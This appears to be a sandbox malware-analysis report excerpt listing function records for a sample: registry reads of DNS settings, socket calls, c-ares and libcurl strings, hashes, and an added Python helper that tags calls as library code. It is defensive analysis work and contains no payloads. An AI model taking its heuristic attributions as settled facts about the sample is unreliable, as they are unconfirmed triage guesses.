                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3e03ddbdbc2bb70ea7a21e23a64836e01825c8f0fec823268674e2c38313f7bd
                                                              • Instruction ID: 25d01756dc777b1baef9eeaed6d749f7d67da3fc5eedf6b9314f3448d3735958
                                                              • Opcode Fuzzy Hash: 3e03ddbdbc2bb70ea7a21e23a64836e01825c8f0fec823268674e2c38313f7bd
                                                              • Instruction Fuzzy Hash: CB91CD3060D34E4BD7358EA88894BBBF2D9EBC4364F148B2CE8A9461D4EBB59D409691
                                                              APIs
                                                              • getsockname.WS2_32(-00000020,-00000020,?), ref: 009FB2B6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: ares__sortaddrinfo.c$cur != NULL
                                                              • API String ID: 3358416759-2430778319
                                                              • Opcode ID: 01d018446367ddb3796a5d45afdc1a042045a9744b82bb5faf2990a7d74deecc
                                                              • Instruction ID: 5249827489a94acdcb004c67a745040dad3d325ea6e131988915a0380acb9f79
                                                              • Opcode Fuzzy Hash: 01d018446367ddb3796a5d45afdc1a042045a9744b82bb5faf2990a7d74deecc
                                                              • Instruction Fuzzy Hash: 91C18D316053099FD718DF24C890A7A77E5EF88354F14886CFA998B3A2DB74ED45CB81
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              • Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: fd2b7a65934e625d63acae62f6f817cd479113c0f63093481058d12dc4cd24b3
                                                              • Instruction ID: e6bbbc1348e68377d86f041b6fc07616fc8cc5b7fab047e990879ccc6c719d88
                                                              • Opcode Fuzzy Hash: fd2b7a65934e625d63acae62f6f817cd479113c0f63093481058d12dc4cd24b3
                                                              • Instruction Fuzzy Hash: AB31A0B49097089BCB00EFB8D58569EBBF4EF44300F00886AE898A7351E7749A44DF62
APIs
• RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 009EAA19
• RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 009EAA4C
• RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 009EAA97
• RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 009EAAE9
• RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 009EAB30
• RegCloseKey.KERNELBASE(?), ref: 009EAB6A
• RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 009EAB82
• RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 009EAC46
• RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 009EAD0A
• RegEnumKeyExA.KERNELBASE ref: 009EAD8D
• RegCloseKey.KERNELBASE(?), ref: 009EADD9
• RegEnumKeyExA.KERNELBASE ref: 009EAE08
• RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 009EAE2A
• RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 009EAE54
• RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 009EAF63
• RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 009EAFB2
• RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 009EB072
Strings
Memory Dump Source
• Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
• Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
Similarity
• API ID: QueryValue$Open$CloseEnum
• String ID: C;$DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
• API String ID: 4217438148-2839143964
• Opcode ID: de959e430eb24dca6abc9f4829848f5bbf5010d0d07cf3637483d92daa60171a
• Instruction ID: 0e31c7b0c1864c757bb0be785841163027f3dc502a4bc35f4deaf34c6ca98345
• Opcode Fuzzy Hash: de959e430eb24dca6abc9f4829848f5bbf5010d0d07cf3637483d92daa60171a
• Instruction Fuzzy Hash: 5872AFB1609341AFE711DB25CC82F6BB7E8AF85700F144828F985972A1EB75ED44CB63
APIs
• setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0096A831
Strings
• Could not set TCP_NODELAY: %s, xrefs: 0096A871
• @, xrefs: 0096A8F4
• @, xrefs: 0096AC42
• sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0096A6CE
• cf_socket_open() -> %d, fd=%d, xrefs: 0096A796
• Local Interface %s is ip %s using address family %i, xrefs: 0096AE60
• Trying %s:%d..., xrefs: 0096A7C2, 0096A7DE
• bind failed with errno %d: %s, xrefs: 0096B080
• Name '%s' family %i resolved to '%s' family %i, xrefs: 0096ADAC
• Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0096AD0A
• Local port: %hu, xrefs: 0096AF28
• Couldn't bind to '%s' with errno %d: %s, xrefs: 0096AE1F
• cf-socket.c, xrefs: 0096A5CD, 0096A735
• Trying [%s]:%d..., xrefs: 0096A689
• Bind to local port %d failed, trying next, xrefs: 0096AFE5
Memory Dump Source
• Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
• Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
Similarity
• API ID: setsockopt
• String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
• API String ID: 3981526788-2373386790
• Opcode ID: 328eac4eddfbbf73525b1f8d8eda5c2600f5123354597eb18bb73e6902ec6432
• Instruction ID: 21921d26cebe6afb76c7ff84e6dad1d1db2f93d8f5453ed3b46e0c062edf5d6d
• Opcode Fuzzy Hash: 328eac4eddfbbf73525b1f8d8eda5c2600f5123354597eb18bb73e6902ec6432
• Instruction Fuzzy Hash: BC62F371508341ABE721CF24C846BABB7E9BFD1314F044929F989A7292E771E944CF93

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed): basic blocks of this function from 009F9740 to 009FA070 with their edges.

APIs
• RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 009F9946
• RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 009F9974
• RegCloseKey.KERNELBASE(?), ref: 009F998B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
• Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
• API String ID: 3677997916-4129964100
• Opcode ID: 4b25b2f230252ac47cacc77d48ce4a7096e11842acdade591c5d86209c4c742e
• Instruction ID: 90e9676269e28dfe604c23ef2761942c6e33e0fc6cfef26775f4aefc4215d7fe
• Opcode Fuzzy Hash: 4b25b2f230252ac47cacc77d48ce4a7096e11842acdade591c5d86209c4c742e
• Instruction Fuzzy Hash: 7F32E9B5900245ABEB11AB25EC42B3B76D8AF94318F084838FE0D96263FB31ED14D753
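The registry and socket calls in the records above (the DNS suffix walk starting at 009EAA19, the DatabasePath lookup at 009F9974 and the setsockopt at 0096A831) are raw API traces, and the strings next to them (ares__sortaddrinfo.c, CARES_HOSTS, cf-socket.c) say which statically linked library emitted them. The Python below is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses such API lines, decodes the HKEY root, the samDesired access mask and the setsockopt level and option, and tags calls whose key and value names match what the c-ares Windows resolver-configuration code reads, so that library noise can be separated from the sample's own behaviour. The fingerprint table, the tag strings and the attribution to libcurl for TCP_NODELAY are the author's assumptions; the sample lines are copied from this page.

```python
"""Added triage helper: parse the "APIs" bullet lines of a Joe Sandbox function record,
decode the Windows constants that matter, and tag calls matching known library code."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed input: API lines copied from the function records on this page.
SAMPLE_LINES = [
    r"• RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 009EAA19",
    r"• RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 009EAB82",
    r"• RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 009EAD0A",
    r"• RegEnumKeyExA.KERNELBASE ref: 009EAD8D",
    r"• RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 009EAE2A",
    r"• RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 009EB072",
    r"• setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0096A831",
    r"• RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 009F9974",
]
API_LINE = re.compile(r"^\s*[•*-]?\s*(?P<api>\w+)\.(?P<module>\w+)"
                      r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
HKEY_NAMES = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_RIGHTS = [(0x20000, "READ_CONTROL"), (0x1, "KEY_QUERY_VALUE"), (0x2, "KEY_SET_VALUE"),
              (0x4, "KEY_CREATE_SUB_KEY"), (0x8, "KEY_ENUMERATE_SUB_KEYS"), (0x10, "KEY_NOTIFY")]
KEY_COMPOSITES = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}

# Analyst-maintained fingerprints (an assumption, not sandbox output). The key and value
# names are the ones the c-ares Windows resolver-configuration code reads; the page's
# "ares__sortaddrinfo.c" string shows c-ares is linked in. TCP_NODELAY on IPPROTO_TCP is
# tied to libcurl only because the same function carries the cf-socket.c strings above.
CARES_TAG = "c-ares: Windows DNS suffix/search-list reader"
CARES_HOSTS_TAG = "c-ares: locate hosts file via DatabasePath"
NODELAY_TAG = "libcurl cf-socket.c: setsockopt(TCP_NODELAY)"
CARES_DNS_KEYS = {r"System\CurrentControlSet\Services\Tcpip\Parameters",
                  r"System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces",
                  r"Software\Policies\Microsoft\Windows NT\DNSClient",
                  r"Software\Policies\Microsoft\System\DNSClient"}
CARES_DNS_VALUES = {"SearchList", "Domain", "DhcpDomain", "PrimaryDNSSuffix"}

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int
    decoded: Dict[str, str] = field(default_factory=dict)
    attribution: str = "unattributed"

def hexarg(s: str) -> Optional[int]:
    # The sandbox prints numeric args as zero-padded hex and unknown ones as "?".
    return int(s, 16) if re.fullmatch(r"[0-9A-Fa-f]+", s) else None

def decode_access(mask: int) -> str:
    if mask in KEY_COMPOSITES:
        return KEY_COMPOSITES[mask]
    names = [n for bit, n in KEY_RIGHTS if mask & bit]
    return "|".join(names) if names else f"0x{mask:X}"

def decode(c: ApiCall) -> ApiCall:
    a = c.args
    if c.api.startswith("RegOpenKeyEx") and len(a) >= 4:  # hKey, lpSubKey, ulOptions, samDesired, phkResult
        root, sam = hexarg(a[0]), hexarg(a[3])
        if root in HKEY_NAMES:
            c.decoded["root"] = HKEY_NAMES[root]
        c.decoded["subkey"] = a[1]
        if sam is not None:
            c.decoded["access"] = decode_access(sam)
        if a[1] in CARES_DNS_KEYS:
            c.attribution = CARES_TAG
    elif c.api.startswith("RegQueryValueEx") and len(a) >= 2:  # hKey, lpValueName, ...
        c.decoded["value"] = a[1]
        if a[1] == "DatabasePath":
            c.attribution = CARES_HOSTS_TAG
        elif a[1] in CARES_DNS_VALUES:
            c.attribution = CARES_TAG
    elif c.api == "setsockopt" and len(a) >= 3:  # s, level, optname, optval, optlen
        level, opt = hexarg(a[1]), hexarg(a[2])
        c.decoded["level"] = {6: "IPPROTO_TCP", 0xFFFF: "SOL_SOCKET"}.get(level, a[1])
        if level == 6 and opt == 1:
            c.decoded["optname"] = "TCP_NODELAY"
            c.attribution = NODELAY_TAG
    return c

def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [x.strip() for x in raw.split(",")] if raw else []
    return decode(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))

def triage(lines: List[str]) -> List[ApiCall]:
    return [c for c in map(parse_api_line, lines) if c is not None]

def summarize(calls: List[ApiCall]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for c in calls:
        counts[c.attribution] = counts.get(c.attribution, 0) + 1
    return counts

if __name__ == "__main__":
    for c in triage(SAMPLE_LINES):
        print(f"{c.ref:08X} {c.api:<18} {c.decoded} -> {c.attribution}")
    print(summarize(triage(SAMPLE_LINES)))
```

Run stand-alone it prints each call with its decoded constants and a count per attribution. Whatever stays "unattributed" is what deserves manual review, with the caveat that per-line tagging cannot see that the RegEnumKeyExA and RegCloseKey calls here sit inside the same c-ares key walk as the tagged opens; the "Strings" record of the function settles that.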

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1020 968b50-968b69 1021 968be6 1020->1021 1022 968b6b-968b74 1020->1022 1023 968be9 1021->1023 1024 968b76-968b8d 1022->1024 1025 968beb-968bf2 1022->1025 1023->1025 1026 968bf3-968bfe call 96a550 1024->1026 1027 968b8f-968ba7 call 946e40 1024->1027 1032 968de4-968def 1026->1032 1033 968c04-968c08 1026->1033 1034 968bad-968baf 1027->1034 1035 968cd9-968d16 SleepEx 1027->1035 1038 968df5-968e19 call 96a150 1032->1038 1039 968e8c-968e95 1032->1039 1036 968c0e-968c1d 1033->1036 1037 968dbd-968dc3 1033->1037 1040 968ca6-968cb0 1034->1040 1041 968bb5-968bb9 1034->1041 1051 968d22 1035->1051 1052 968d18-968d20 1035->1052 1045 968c35-968c48 call 96a150 1036->1045 1046 968c1f-968c30 connect 1036->1046 1037->1023 1075 968e1b-968e26 1038->1075 1076 968e88 1038->1076 1043 968e97-968e9c 1039->1043 1044 968f00-968f06 1039->1044 1040->1035 1047 968cb2-968cb8 1040->1047 1041->1025 1049 968bbb-968bc2 1041->1049 1053 968e9e-968eb6 call 942a00 1043->1053 1054 968edf-968eef call 9378b0 1043->1054 1044->1025 1074 968c4d-968c4f 1045->1074 1046->1045 1055 968cbe-968cd4 call 96b180 1047->1055 1056 968ddc-968dde 1047->1056 1049->1025 1050 968bc4-968bcc 1049->1050 1058 968bd4-968bda 1050->1058 1059 968bce-968bd2 1050->1059 1061 968d26-968d39 1051->1061 1052->1061 1053->1054 1080 968eb8-968edd call 943410 * 2 1053->1080 1078 968ef2-968efc 1054->1078 1055->1032 1056->1023 1056->1032 1058->1025 1068 968bdc-968be1 1058->1068 1059->1025 1059->1058 1071 968d43-968d61 call 94d8c0 call 96a150 1061->1071 1072 968d3b-968d3d 1061->1072 1077 968dac-968db8 call 9750a0 1068->1077 1099 968d66-968d74 1071->1099 1072->1056 1072->1071 1082 968c51-968c58 1074->1082 1083 968c8e-968c93 1074->1083 1084 968e2e-968e85 call 94d090 call 974fd0 1075->1084 1085 968e28-968e2c 1075->1085 1076->1039 1077->1025 1078->1044 1080->1078 1082->1083 1089 968c5a-968c62 1082->1089 1092 968dc8-968dd9 call 96b100 1083->1092 1093 968c99-968c9f 
1083->1093 1084->1076 1085->1076 1085->1084 1095 968c64-968c68 1089->1095 1096 968c6a-968c70 1089->1096 1092->1056 1093->1040 1095->1083 1095->1096 1096->1083 1101 968c72-968c8b call 9750a0 1096->1101 1099->1025 1104 968d7a-968d81 1099->1104 1101->1083 1104->1025 1105 968d87-968d8f 1104->1105 1109 968d91-968d95 1105->1109 1110 968d9b-968da1 1105->1110 1109->1025 1109->1110 1110->1025 1113 968da7 1110->1113 1113->1077
                                                              APIs
                                                              • connect.WS2_32(?,?,00000001), ref: 00968C30
                                                              • SleepEx.KERNELBASE(00000000,00000000), ref: 00968CF3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
• Associated: 00000000.00000002.1819556702.0000000000930000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1819574715.0000000000F43000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1819574715.0000000000F45000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820016300.0000000000F48000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.0000000000F4A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000010D9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000011E1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000012BF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000012C7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820035397.00000000012D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820338791.00000000012D6000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820460651.000000000148D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1820479825.000000000148F000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: Sleepconnect
                                                              • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                              • API String ID: 238548546-879669977
                                                              • Opcode ID: 7d40bb756c8ada4d51fe07fc5eb09afddd49f99d253c8112f9020152d6f51167
                                                              • Instruction ID: 0a8fe6e34fc42dc85cd8280bdf8e957eeee8f1247d5865d9eb2e8693f7383b96
                                                              • Opcode Fuzzy Hash: 7d40bb756c8ada4d51fe07fc5eb09afddd49f99d253c8112f9020152d6f51167
                                                              • Instruction Fuzzy Hash: CDB1D370604305AFDB10DF34C885BA7B7E8AF85318F048A2CE8995B2D2DB75EC55C762

Control-flow Graph (rendered graph not reproduced; basic blocks and edges recovered from the graph data)

• 1114: 932f17-932f8c, call d6f570, call d6f960 -> 1119
• 1119: 9331c9-9331cd -> 1120, 1121
• 1120: 9331d3-9331d6 (no successors)
• 1121: 932f91-932ff4, call 931619, RegOpenKeyExA -> 1124, 1125
• 1124: 9331c5 -> 1119
• 1125: 932ffa-93300b -> 1126
• 1126: 93315c-9331ac, RegEnumKeyExA -> 1127, 1128
• 1127: 9331b2-9331c2, RegCloseKey -> 1124
• 1128: 933010-933083, call 931619, RegOpenKeyExA -> 1131, 1132
• 1131: 933089-9330d4, RegQueryValueExA -> 1133, 1134
• 1132: 93314e-933152 -> 1126
• 1133: 9330d6-933137, call d6f840, call d6f8d0, call d6f960, call d6f770, call d6f960, call d6dce0 -> 1134
• 1134: 93313b-93314b, RegCloseKey -> 1132

Shape: block 1121 opens a key, 1126 iterates its subkeys with RegEnumKeyExA, 1128 opens each subkey, 1131 reads one value from it, 1133 processes the value, 1134 closes the subkey and 1132 returns to the enumeration; the 1119/1124 cycle repeats the whole sequence, and 1127 closes the parent key when the enumeration ends.
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1819574715.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_930000_1o81tDUu5M.jbxd
                                                              Similarity
                                                              • API ID: CloseEnumOpen
                                                              • String ID: d
                                                              • API String ID: 1332880857-2564639436
                                                              • Opcode ID: 5ee082dce2d826e56d65b69095f8cb5e70219e75796db0cdf4cbf783ffbea070
                                                              • Instruction ID: bea9edc7928da3a9f3fcfbdc78f3b60a8d9378608d4ab76cb450d76a9a50d77d
